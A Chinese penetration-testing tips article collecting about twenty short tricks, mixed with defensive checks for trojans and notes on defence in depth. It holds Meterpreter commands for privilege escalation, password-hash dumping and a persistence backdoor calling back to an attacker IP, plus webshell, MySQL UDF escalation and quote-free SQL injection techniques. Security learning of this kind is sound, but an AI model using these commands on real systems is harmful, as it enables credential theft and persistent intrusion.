渗透测试笔记四

安全 黑客攻防
渗透测试笔记主要为一些短小但又精华的渗透小技巧,旨在与小伙伴们分享学习心得。为保证质量,每一篇为20条左右的渗透小记。

渗透笔记主要为一些短小但又精华的渗透小技巧,旨在与小伙伴们分享学习心得。为保证质量,每一篇为20条左右的渗透小记。

1、在Webshell中,如果上传文件时提示缺少对象。可以尝试写一句话,用菜刀连接之后用菜刀上传文件。

2、使用meterpreter的hashdump提取windows口令的哈希值:

  1. meterpreter > getuid                //获知当前权限级别 
  2. meterpreter > getsystem        //提升权限 
  3. meterpreter > run hashdump 

3、网站http://www.md5decrypter.co.uk/,可提供对NTLM/LM hash值的在线解密(小编注:这个网站破解MD5的命中率也很高哦)。

3、使用meterpreter建立后门:

  1. meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1 
  2. -A参数用于在攻击方机器上自动启动监听程序。 
  3. -S参数表示将后门程序设置为Windows系统启动时加载。 
  4. -U参数表示后门设置为用户登陆系统时自动执行。 
  5. -i参数用于设置后门回连到代理处理程序的时间间隔 
  6. -p是端口号 
  7. -r是目标机器的ip地址 

4、网络纵深防御思想:作为一个公司,它会为物理线路聘用一个巡线员(第一层),在工作组交换机上做端口安全(第二层),在边界路由器上做访问列表(第三层),在防火墙中建立DMZ区和包过滤(第四层),设置IDS/IDP监测/阻拦(第三至七层),建立SSL通道(第六层),设置内容过滤(第七层),提供AAA服务(第七层),进行漏洞扫描(第四至七层)和病毒扫描(第七层)等。

——摘自《IT安全面试攻略》

5、IPS设备可以提供攻击检测和防御两种功能,如果以镜像方式接入,就使用反应机制;如果以串行方式接入,就使用阻断机制。

6、根据ip获知对方电脑的名称:ping -a ip地址,

如:ping -a 192.168.235.253

 

QQ截图20131205215004

 

7、在系统“windows”文件夹下,点击打开“system.ini”文件,在代码中如果有[boot]代码,其中shell语句的格式一般为“shell=文件名”,如果后面还跟有一个文件名(如shell=文件名+文件名),则很可能是木马程序。

8、在系统“windows”文件夹下,点击打开“win.ini”文件,在代码中如果有“run=?”或者“load=?”代码类型,一定要注意其后的文件。一般情况下,“run=”和“load=”后面就没有内容了,如果有路径或不熟悉的文件名,可能就是木马程序。

9、木马隐藏的方式很多,一般都隐藏在注册表的

1HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

目录下。查看键值中有没有不熟悉的可执行文件,该类文件可能就是木马程序。

10、专门捕获网页的嗅探器——艾菲网页侦探:艾菲网页侦探是一个HTTP协议的网络嗅探器,专门捕捉局域网中含有HTTP协议的数据包,并对其进行分析,找出符合过滤器的那些HTTP通信内容。

11、常见的windows XP系统漏洞:RDP漏洞、远程明文账户名传送漏洞、UPnP缓冲溢出漏洞、热键漏洞、拒绝服务漏洞

12、常见window 7系统漏洞:内核驱动程序中的漏洞、辅助驱动程序中的漏洞、IE的积累性安全更新漏洞、颜色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。

13、清除BIOS密码之魔法攻击法:如果你能进入系统,可以用BiosPwds、CmosPwd等软件清除。(小编注:一般就别想了)

14、清除BIOS密码之物理攻击法:关闭电源,将主板上的正确跳线帽用专业工具挑出,将跳线帽由原来标示为“1”、“2”针脚套在标示为“2”、“3”的针脚上,再将跳线帽复原,打开电源,即可发现BIOS密码已清除。如果遇到较老的机子,可是拆掉电池、再用导电工具短接清除密码。

15、mysql数据库拥有读写文件权限时,成功写入文件的条件需单引号不转义、不可覆盖已存在文件、必须为最后一条语句。因此magic_quotes_gpc必须为0ff。

16、渗透提权过程中,得知mysql数据库连接账号和密码时可以尝试UDF方式提权,前提是系统必须为windows。当然如果权限高的话,还可以使用mof写入系统的方式提权。

17、渗透过程中如目标开启rsync服务,默认873端口,可尝试无口令登录,权限设置不足的可直接上传文件,最不济也可查看目标站点文件。

18、端口转发时如果lcx不起作用,可尝试reduh这个工具,不过速度稍微有点捉急!(其实那速度会让你有砸键盘的冲动)

19、数字型注入中,无单引号注入方法有两种,一种是定义注入字符串为16进制赋值变量@r,然后exec(@r)执行;另外一种是使用char()函数和“+”号来进行。

责任编辑:蓝雨泪 来源: 网络安全攻防实验室
相关推荐

2014-04-03 09:35:28

2013-12-30 13:11:03

2013-12-24 13:15:59

2013-11-28 10:32:10

2013-11-28 13:03:17

2014-02-18 15:53:04

2013-11-28 11:29:39

2009-01-07 21:00:05

2014-11-21 10:32:33

2014-05-16 10:55:47

Spark

2010-08-03 22:09:16

2016-09-09 01:14:17

2013-11-06 16:38:59

2021-07-15 10:46:21

渗透测试网络安全网络攻击

2017-07-24 17:00:49

2022-07-19 16:59:25

安全漏洞Web

2010-09-13 11:05:08

2010-09-16 16:08:46

2016-10-10 22:11:02

2013-05-27 13:37:06

点赞
收藏

51CTO技术栈公众号